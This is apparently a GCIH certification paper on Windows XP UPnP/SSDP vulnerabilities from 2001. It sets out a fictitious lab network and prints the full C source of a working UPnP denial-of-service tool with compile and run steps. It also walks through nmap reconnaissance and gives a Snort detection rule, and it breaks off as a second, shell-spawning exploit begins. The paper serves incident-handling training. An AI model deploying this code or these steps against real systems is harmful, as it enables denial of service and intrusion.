Microsoft UPnP Exploits Chip Calhoun – GCIH Practical Version
microsoft upnp exploits chip calhoun – gcih practical version 2 chip calhoun ============ windows xp upnp exploits ==========
Microsoft UPnP Exploits Chip Calhoun – GCIH Practical Version 2 Chip Calhoun ============ Windows XP UPnP Exploits ======================== GCIH Practical Assignment ========================= Version 2.0 =========== Chip Calhoun 1 Windows XP UPnP Exploits 1 GCIH Practical Assignment 1 Version 2.0 1 Introduction 4 The Exploit 4 Microsoft UPnP NOTIFY Buffer Overflow Vulnerability 4 CVE: 4 Bugtraq ID: 4 Date Vulnerability Published: 4 This vulnerability affects the following operating systems: 4 Microsoft Universal Plug and Play Simple Service Discovery Protocol Denial of Service Vulnerability 5 CVE: 5 Bugtraq ID: 5 Date Vulnerability Published: 5 This vulnerability affects the following operating systems: 5 Protocols/Services/Applications 5 A Brief Description of the Exploits 6 Buffer Overflow 6 DoS and DDoS 6 Variants 7 References for the Descriptions of the Exploits 7 The Attack 7 Description and Diagram of Network 8 Network Device Details 10 Firewall 10 DMZ Switch 10 Internal Switch 10 XP Victim Machine for Data Collection 10 Web Server in the DMZ 12 External DNS Server 12 SMTP Gateway Server 12 Snort IDS Server 12 Infrastructure Servers 13 Hacker Laptop 13 Machines on the Client VLAN 13 Protocols Used by the Exploit 13 TCP/IP (Transmission Control Protocol/Internet Protocol) 13 SSDP (Simple Service Discovery Protocol) 13 HTTPMU and HTTPU 14 SOAP (Simple Object Access Protocol) 14 GENA (General Event Notification Architecture) 14 XML (Extensible Markup Language) 14 How the Exploit Works 15 DOS Attack 15 Signature of the Attack 20 The Buffer Overflow 21 Signature of the Attack 28 How to Protect Against the Attacks 29 The Incident Handling Process 30 Preparation 30 Identification 31 Containment 33 Eradication 35 Recovery 35 Lessons Learned 36 37 References 38 Introduction ============ To set the tone, I believe this quote from a paper entitled “Discovery and Its Discontents” dated April 2000 is appropriate: UPnP requires IP, not to mention HTTP and XML. Non-IP networks and interconnects can be bridged, at least at the level of the XML, if not elsewhere. UPnP has no specific security features. It depends on the network and Web infrastructure for its security. Thus, security is clearly "optional".1 The UPnP (Universal Plug and Play) standard has experienced a rocky start in terms of security but the services have the potential to allow for ease of configuration between computers and devices wanting to communicate and make use of each other’s services over local and wide area networks. The purpose of this paper is to point out recently discovered vulnerabilities in systems utilizing Universal Plug and Play services, how the vulnerabilities can be mitigated through vigilance and the appropriate patch levels being applied as recommended when produced by the vendor. During our walk through the minefield of buffer overruns, zero confirmation on network response types and limitless allowance for the return of data, I hope to illustrate how the vulnerabilities can be exploited to compromise corporate networks and home users alike. After the network has been compromised, we will march through the steps of the incident handling process. The Exploit =========== Microsoft UPnP NOTIFY Buffer Overflow Vulnerability2 ---------------------------------------------------- CVE: CAN-2001-0876 (Under Review) Bugtraq ID: 3723 Date Vulnerability Published: December 20, 2001 This vulnerability affects the following operating systems: Microsoft Windows 98 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows XP + Microsoft Windows XP Home Edition + Microsoft Windows XP Professional Microsoft Universal Plug and Play Simple Service Discovery Protocol Denial of Service Vulnerability3 ------------------------------------------------------------------- CVE: CAN-2001-0877 (Under Review) Bugtraq ID: 3724 Date Vulnerability Published: December 20, 2001 This vulnerability affects the following operating systems: Microsoft Windows 98 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows XP + Microsoft Windows XP Home Edition + Microsoft Windows XP Professional A note of detail about the operating systems listed above that are affected by the two vulnerabilities of the UPnP services outlined in this paper. UPnP services via SSDP notifications and searches are installed and enabled by default in Windows XP Home Edition and Windows XP Professional. Microsoft’s default version of Windows ME does not have UPnP services enabled by default but it is installed. It should be mentioned that some OEM vendors ship their systems with copies of Windows ME that do have UPnP enabled. Windows 98 and Windows 98 SE do not have UPnP installed, however, by installing ICT (Internet Connection Sharing) from a Windows XP machine, UPnP services will be installed and enabled. Protocols/Services/Applications ------------------------------- UPnP (Universal Plug and Play) http://www.upnp.org/download/UPnPDA10_20000613.htm SSDP (Simple Service Discovery Protocol) http://www.upnp.org/download/draft_cai_ssdp_v1_03.txt Other protocols used will be pointed out in the “Attack” portion of the document. The primary protocol facilitating the Buffer Overflow, DoS and DDoS UPnP exploit of the affected OS list is SSDP (Simple Service Discovery Protocol). SSDP outlines the format by which a UPnP device can be set up for use by sending notification that it has services to provide or that it is looking for services to use without intermediary configuration. A device such as a UPnP network printer which has services to offer will send a NOTIFY directive when it comes online on a network. The NOTIFY directive is to tell UPnP aware devices that it is available for use as it joins the network. Within the NOTIFY directive, a URL is given so other UPnP devices will know where to get more information about the services it is offering. If existing devices on the network have a need for using the devices that sent the directive, they will gather the configuration information from the supplied URL via HTTP and the device will be installed and made ready for use. When a UPnP aware device that is looking for the services of other UPnP devices boots and joins a network, it will broadcast an M-SEARCH directive. The M-SEARCH directive is a request for information about other UPnP devices that already exist on the network. Each existing UPnP device should respond to this directive with information about what services it has to offer and where to find more information regarding it’s use. A Brief Description of the Exploits ----------------------------------- Buffer Overflow One of the components of the UPnP service contains an unchecked buffer. The unchecked buffer can be exploited if a well crafted but malformed NOTIFY directive message contains code that allows it to overwrite standard service instructions with arbitrary code. The code executes with system level access allowing for full control of the affected computer. The exploit can be sent to a single address via unicast or an entire subnet of computers via a multicast address. An entire subnet of vulnerable computers can be compromised by one multicast UPD message. DoS and DDoS The DoS condition can occur if a malicious user sends a spoofed NOTIFY message that contains information within its URL that directs the victim UPnP computer to a host that is listening on an echo port. When the request is made to the URL included in the spoofed NOTIFY directive (its true destination being an echo port) the request would then be echoed back to the victim computer. Not receiving the information it needs to set up the device, the victim will send the request again starting a cycle of request and echo of it’s own information that can only be stopped by restarting the UPnP services. This transfer of information could eventually use all of the victim computer’s resources causing the system to be reset in order to recover. The DDoS condition can be exploited if the spoofed NOTIFY directive described in the DoS attack above includes an address of a 3rd party victim. If the information about the UPnP resource is sent to the spoofed address of the 3rd party, it is possible that the amount of traffic will cause the victim’s networking and system resources to be consumed while attempting to handle the communication, thus forcing a reboot to recover the victim’s machine. Variants -------- Earlier forms of attacks against UPnP did not include exploiting unchecked buffers. They were only capable of crashing the UPnP service and consuming system resources. One method that was used involved making multiple simultaneous connections to SSDPSRV, 1018 as documented, at TCP port 5000.4 The attacker would then send special HTTP headers followed by steady strings of ‘A’s. The victim machine could then be forced to freeze for a short period of time but it would recover when the connection queue dropped and the system resources were recovered. References for the Descriptions of the Exploits ----------------------------------------------- CERT: http://www.cert.org/advisories/CA-2001-37.html Security Focus – Buffer Overflow http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=discussion&id=3723 Security Focus – DoS and DDoS http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=discussion&id=3724 eEye Digital Security – Method of discovery and examples of malformed requests http://www.eeye.com/html/Research/Advisories/AD20011220.html The Attack ========== This description and the included drawing are fictitious and serve only to provide a bed for the attack. The exploit will target a Windows XP Professional system placed in the DMZ of an Internet Gateway of REC Company to collect traffic data. Description and Diagram of Network ---------------------------------- The Internet Gateway and Network of REC Company is comprised of 1 Cisco Router, 3 Cisco Switches, 1 CheckPoint FW-1 version 4.0, 1 Web Server, 1 External DNS Server, 1 SMTP Gateway Server, multiple Infrastructure servers and multiple client and administrative computers. For the purposes of this document, all 10.x.x.x addresses should be considered public addresses (i.e. Internet Routable) and all 192.168.x.x addresses should be considered private addresses. REC Company is performing NAT on the external interface of the firewall to hide internal addresses. No NAT is performed for the addresses that reside in the DMZ and all are fully Internet Routable. The network is graphically represented in (Figure 1).
Network Device Details Edge Router Cisco 2611 No connections are allowed with the destination being the router itself on its external interface. Anti-Spoofing access lists are enabled which include the addresses used inside the perimeter. There are no other special restrictions for traffic beyond a standard router configuration required to pass gateway traffic. The network administrator believed that the firewall was ample protection for the internal networks. Edge Switch Cisco 3512 No VLANS Firewall CheckPoint Firewall 1 Version 4.0 on Nokia IPSO ICMP is allowed at rule 0 The Rule Set is as Shown in (Figure 2) DMZ Switch Cisco 3512 Two spanned monitoring ports for the entire DMZ No VLANS Internal Switch Cisco 3524 VLAN 501 (Server VLAN) VLAN 502 (Client VLAN) XP Victim Machine for Data Collection IBM T21 Laptop Plugged into one of the spanned ports on the switch Default load of XP with no patches No Firewall Capabilities in Use No Virus Protection WinPcap V 2.3 Snort v 1.8.3 (not running) Ethereal 0.9.1 NmapNT SP1 Listening TCP Ports: 135 (loc-srv), 445 (microsoft-ds), 1025 (blackjack), 5000 (UPnP) Open UDP Ports: 135 (loc-srv), 445 (microsoft-ds), 500 (IKE), 123 (NTP) 1900 (UPnP)
Figure 2 Web Server in the DMZ Compaq Proliant DL370 Windows 2000 SP 2 Security Rollup Package 1 IIS 5 Up to Date Virus Protection Listening TCP Ports: 80 (HTTP), 443 (HTTPS) External DNS Server Compaq Proliant DL370 Linux RedHat 7.1 Latest Errata for Loaded Packages Tripwire 2.3-47 Bind 9.2.0 Listening TCP Ports: 22 (SSH), 53 (DNS) SMTP Gateway Server Compaq Proliant DL370 Linux RedHat 7.1 Latest Errata for Loaded Packages Tripwire 2.3-47 SendMail 8.12.2 Listening TCP Ports: 22 (SSH), 25 (SMTP) Snort IDS Server Compaq Proliant DL 370 Two Interfaces +Eth0 has an IP and is connected to a normal switched port +Eth1 has no IP and is connected to a spanned port for the entire DMZ Linux RedHat 7.1 Sendmail 8.12.2 IPChains The Latest Errata for Loaded Packages Nessus 1.0.10 Snort-Stable-1.8.4-beta1 Listening TCP Ports: 22 (SSH), 25 (SMTP), 1241 and 3001 (Nessus) Infrastructure Servers Compaq Proliant Servers Various Operating System Installations + Windows 2000 SP 2 with Security Rollup Package 1 + NT 4 SP6a – Up to date Security Patches Compaq Insight Manager + Linux Redhat 7.2 Up to Date Virus Protection Hacker Laptop Toshiba Satellite 3000 Series Linux Redhat 7.1 NMAP 2.54BETA30 Nessus 1.0.10 Snort 1.8.3 TCPDUMP 3.7 NetCat 1.10 Machines on the Client VLAN Various Hardware Platforms Various Operating System Installations including + Windows 2000 SP 2 with Security Rollup Package 1 + XP Default Load with MS01-054 and MS01-059 + NT 4 Workstations SP6a with Security Rollup Packages Up to Date Virus Protection Protocols Used by the Exploit ----------------------------- The exploit of UPnP makes use of several protocols, each included with a short description below: TCP/IP (Transmission Control Protocol/Internet Protocol) TCP/IP is the basis for each of the protocols used to exploit UPnP. SSDP (Simple Service Discovery Protocol) From an Internet Draft for the Internet Engineering Task Force, SSDP is described as follows: “The Simple Service Discovery Protocol (SSDP) provides a mechanism where by network clients, with little or no static configuration, can discover network services. SSDP accomplishes this by providing for multicast discovery support as well as server based notification and discovery routing.”5 SSDP uses HTTPMU and HTTPU to deliver the discovery requests and notifications. HTTPMU and HTTPU HTTPMU and HTTPU provide the ability for SSDP to deliver HTTP messages over UDP/IP rather than TCP/IP. SOAP (Simple Object Access Protocol) SOAP defines a way to execute Remote Procedure Calls using XML via HTTP. It is in effect the control mechanism for UPnP devices to get and provide the specific information and methods for configuration over the network. GENA (General Event Notification Architecture) GENA outlines the formats that the request for services and instructions for their use should be delivered. XML (Extensible Markup Language) XML is the formatting language used to provide structure for the information being delivered. Each of the protocols work together with specific responsibilities best described graphically in (Figure 3).6
Figure 3 How the Exploit Works --------------------- For the purposes of this document, I will describe the way the exploit would work if the buffer overflow were used against the Windows XP Client on the REC Company network. For interest I will also show a DOS attack in action against a default load of Windows XP Professional using the upnp_udp.c code. DOS Attack ---------- To set the stage, we have a default load of Windows XP Professional with a Pentium II 400 Mhz processor and 128 MB of RAM sitting on a network. Its name is VICTIM and the IP address 192.168.63.5. Two other machines that exist on this network which are included in this attack are SHELBY, a Windows XP Professional with a 400 Mhz AMD Athlon Processor and 128 MB of RAM. SHELBY’s IP address 192.168.63.2. We also have the attacker named CUJO, a Linux RedHat 7.1 with a 150 Mhz processor and 96 MB of RAM at IP address 192.168.63.3. Here is the actual code we will use courtesy of Gabriel Maggiotti and Fernando Oubina:7 /* * WinME/XP UPNP D0S * * ./upnp_udp * * Authors: Gabriel Maggiotti, Fernando Oubiña * Email: [email protected], [email protected] * Webpage: http://qb0x.net */ #include #include #include #include #include #include #include #include #include #include #include #include #define MAX 1000 #define PORT 1900 char *str_replace(char *rep, char *orig, char *string) { int len=strlen(orig); char buf[MAX]=""; char *pt=strstr(string,orig); strncpy(buf,string, pt-string ); strcat(buf,rep); strcat(buf,pt+strlen(orig)); strcpy(string,buf); return string; } /***************************************************************************/ int main(int argc,char *argv[]) { int sockfd,i; int numbytes; int num_socks; int addr_len; char recive_buffer[MAX]=""; char send_buffer[MAX]= "NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n" "CACHE-CONTROL: max-age=1\r\nLOCATION: http://www.host.com:port/\r\n" "NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n" "NTS: ssdp:alive\r\nSERVER: QB0X/201 UPnP/1.0 prouct/1.1\r\n" "USN: uuid:QB0X\r\n\r\n\r\n"; char *aux=send_buffer; struct hostent *he; struct sockaddr_in their_addr; if(argc!=4) { fprintf(stderr,"usage:%s "\ "\n",argv[0]); exit(1); } aux=str_replace(argv[2],"www.host.com",send_buffer); aux=str_replace(argv[3],"port",send_buffer); if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } if( (sockfd=socket(AF_INET,SOCK_DGRAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(PORT); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); if( (numbytes=sendto(sockfd,send_buffer,strlen(send_buffer),0,\ (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) ==-1) { perror("send"); exit(0); } close(sockfd); return 0; } First the code must be compiled on the platform from which you choose to run it. I compiled it on Linux 7.1 using gcc with the following command line: gcc ./upnp_udp.c –o upnp_udp The result is an executable file named: upnp_udp You now need a computer on the network listening on its character generator port of 19 (chargen) before the exploit can be successfully executed. Having only one Linux machine on my network, I decided to load “Simple TCP/IP Services” on another Windows XP Professional box named SHELBY. This installs and enables several UNIX like network services including echo, discard, daytime, qotd and the chargen port. After this was completed, I ran the exploit as seen below in (Figure 4).
Figure 4 From (Figure 4) above, the Linux session is seen in the background via an SSH connection with the command line visible. The VICTIM’s CPU usage and memory consumption is in the foreground. It took about 10 minutes to chew up all of the available memory but it did eventually cause the VICTIM machine to become unusable requiring a restart. To illustrate the network traffic and protocols involved, see (Figure 5).
Figure 5 From this screen, you can see that CUJO sent a crafted SSDP NOTIFY directive to the VICTIM computer over UDP to port 1900. Riding on UDP, you can see HTTP carrying the instructions for where the VICTIM should go to look for information about configuring an Internet Gateway Device. This directive tells the VICTIM to look at 192.168.63.2 (SHELBY) on port 19. You then see the VICTIM sending an ARP request asking who has IP address 192.168.63.2 and SHELBY answers with its MAC address. The VICTIM then connects to SHELBY on port 19 and is stuck in an endless stream of characters shown in (Figure 6).
Figure 6 Signature of the Attack The Snort IDS rule to alert on the exploit is shown below and is from the misc.rules file provided with the snort-stable version 1.8.4-beta1:8 alert udp $EXTERNAL_NET any -> $HOME_NET 1900 (msg:"MISC UPNP malformed advertisement"; content:"NOTIFY * "; nocase; classtype:misc-attack; reference:cve,CAN-2001-0876; reference:cve,CAN-2001-0877; sid:1384; rev:2;) Notice that the content portion of the rule above written to fire on the malformed advertisement exists and is highlighted in top of the three application windows that can be found in (Figure 5). The alert below was recorded when the exploit was run: [**] [1:1384:2] MISC UPNP malformed advertisement [**] [Classification: Misc Attack] [Priority: 2] 02/07-01:58:19.220868 192.168.63.3:1025 -> 192.168.63.5:1900 UDP TTL:64 TOS:0x0 ID:20074 IpLen:20 DgmLen:262 Len: 242 [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0876] [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0877] The DOS attack succeeded and the rule from Snort IDS fired on the event. Note: Ways to protect against the exploits of UPnP will be described after the Buffer Overflow is addressed. The Buffer Overflow ------------------- A hacker closed down his Netscape browser satisfied that he picked up a juicy bit of information from a short article in the technology section of the Hometown News. The reporter had given gratuitous details about how the always-innovative widget manufacturer, REC Company, was in the process of upgrading their base operating system to Windows XP Professional for their client computers. A quick lookup of the URL for REC Company showed the hacker that the IP address was 10.10.10.3. The hacker then looks up this address at www.arin.net, and was able to see that REC Company owned the entire address space of 10.10.10.0 – 10.10.10.255. To stay as anonymous as possible during his first bit of reconnaissance, the hacker decided to go to his neighborhood coffee shop, have a cup of joe and run a ping sweep of the 10.10.10.0/24 address space to see what might respond. He received four responses, one reply from 10.10.10.2 that he thought must be a switch or a router if REC Company was following a numbering scheme similar to the majority of networks he had hacked in the past. The other responses were from 10.10.10.3, 10.10.10.4, 10.10.10.5 and 10.10.10.6. Now that the hacker had a few additional IP addresses of interest in the REC Company address range that he could ping, he decided to go back home and start some more serious reconnaissance. With this information, the hacker fired up NMAP and typed in the commands in (Figure 7).
Figure 7 10.10.10.4 responded with open ports on which a DNS server would listen. Port State Service 22/tcp open ssh 23/tcp open telnet 53/tcp open domain 10.10.10.5 responded with open ports on which a SMTP server would listen. Port State Service 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 10.10.10.6 was a little more interesting listening on the following ports: Port State Service 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open listen 5000/tcp open fics The hacker had a strong feeling that this machine would be his way in the door as it was clearly a Windows machine listening on the standard netbios ports and it might even be one of the new XP boxes listening on port 5000. To find out, he sent the following command from nmap: Nmap –sU –p 1900 10.10.10.6 The result was as expected: Port State Service 1900/udp open unknown Now, he was fairly certain this machine was running Windows XP. The hacker was ready to try his attack using the exploit code he found for the recently reported UPnP Buffer Overflow. The hacker knew that if this was a default load of Windows XP, he could get the machine to spawn a cmd.exe shell on port 7788; at least that is what the code promised in its comments. He would have full access including all rights at the system level once the code was run and he successfully connected to the listening port using netcat. Below is the exploit code the hacker plans to use.9 /* * WinME/XP UPNP dos & overflow * * Run: ./XPloit host